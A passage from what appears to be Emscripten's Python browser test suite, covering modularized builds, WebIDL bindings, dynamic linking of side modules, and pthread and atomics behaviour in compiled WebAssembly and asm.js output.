HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
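# The next test deletes a.out.wasm after linking so that createModule() rejects; the .catch()
# handler reports err.message truncated to 54 characters, which is exactly the length of the
# expected "abort(both async and sync fetching of the wasm failed)" string.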
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
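# (totalMemory below is 33554432 bytes = 32 MB; the value is handed to the module factory at
# runtime, which only works for asm.js output, hence -s WASM=0 in the build.)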
def test_modularize_and_preload_files(self):
# an amount of memory for the emscripten heap that differs from the default allocation
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use bracket notation here so the closure-compiler-enabled build does not rename the property
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl', 'test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
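# The dynamic linking tests below build side modules with -s SIDE_MODULE and the main program
# with -s MAIN_MODULE; pre.js fills in Module.dynamicLibraries so the runtime loads the side
# module(s) before main() runs, and an EM_ASM hook captures out() to verify what got printed.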
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
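# prep_no_SAB() writes an html.html shell that hides SharedArrayBuffer and Atomics, letting a
# test build against that shell to simulate a browser without threading support.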
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-gsource-map', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
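# With -s PTHREAD_POOL_SIZE_STRICT=2 the runtime refuses to grow the pool beyond
# PTHREAD_POOL_SIZE, so the second build below (pool of 3, test needs 4 threads) aborts in
# thrd_create() instead of deadlocking.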
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the remaining GCC atomics beyond the two tests above.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs the chrome renderer, and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call sbrk(), and the main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to the filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), this does not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
